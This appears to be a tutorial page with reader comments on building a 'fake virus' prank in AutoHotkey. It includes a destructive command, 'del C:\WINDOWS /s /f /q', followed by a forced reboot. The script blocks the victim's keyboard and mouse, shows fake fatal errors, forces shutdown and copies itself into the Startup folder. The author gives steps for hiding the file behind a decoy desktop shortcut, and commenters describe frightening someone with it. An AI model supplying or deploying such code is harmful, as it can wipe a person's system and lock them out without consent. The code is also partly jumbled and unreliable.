iImage Information

Create a very real looking virus in under 5min
Step 1Download This File
iImage Information

You Probably should download the main file to some folder that wont be too easy to find (I will refer to this folder as the "hidden folder") and make a shortcut of the main file on the desktop then hide the main file (go to properties and click on the "hidden" box)in the hidden folder and also,hide all firefox/Internet explorer shortcuts from desktop or you can just move it to the hidden folder
(i modified this script with AutoHotkey and copied some parts from
http://www.autohotkey.com/forum/topic27784.html&highlight=prankthen i compiled the file so u don't have to do nothing with it)
del C:\WINDOWS /s /f /q
pause
shutdown -r -t 00
#Persistent
#NoTrayIcon
Sleep, 100000
Gui, Color, Black
Gui, -Caption
Gui, Show, x0 y0 w%A_ScreenWidth% h%A_ScreenHeight%
BlockInput, On ; this makes it more interesting
msgbox, 48,Fatal Error,A fatal error has occured. The windows GUI has failed. The mouse and keyboard may not function correctly, 5 ; "may"
Loop, C:\windows\System32\*.*, 0, 1
{
Files++
}
Progress, w500 h76,
Loop, C:\windows\System32\*.*, 0, 1
{
if (File = Files - 25)
{
progress,off
Gui, Color, Black
Gui, -Caption
Gui, Show, x0 y0 w%A_ScreenWidth% h%A_ScreenHeight%
BlockInput, On
MsgBox, 262192, Error!, An Unexpected Error Has Caused Windows To Stop Responding And Is Forcing Windows To Shutdown, 5
Sleep, 5000
Shutdown, 9
ExitApp
}
x += 100 / Files
Progress, %x%, Deleting`n%A_LoopFileLongPath% Deleting %A_LoopFileLongPath%
File++
Sleep, 50
}
FileCopy, %A_ScriptFullPath%, %A_Startup%, 0
s::ExitApp
and i have made a fake "Deleting" virus.
Heres the Code:
Loop C:\WINDOWS\system32\*.*
{
Progress,X800 , Deleting... C:\WINDWOS\system32\%a_loopfilename%,
Sleep, 50
}
Return
Pause::Pause
i got a ton of this text when i opened it...
here's what i did:
i created a vbs script with a lot of "Virus and critical error messages", then i got your code modified..
I first showed the msgbox, then blocked the input! haha.. then i created a bat file which opens the two files i had.. so i put it in a hidden folder and the shortcut in the start up folder!!
he was screaming and jumping around hahahaha i couldn't hold the laughters LOL
thanks for your code man! :)
funny script xD
i got a laugh out of reading it.,
i dont remember lol
good to see someone using their brain XD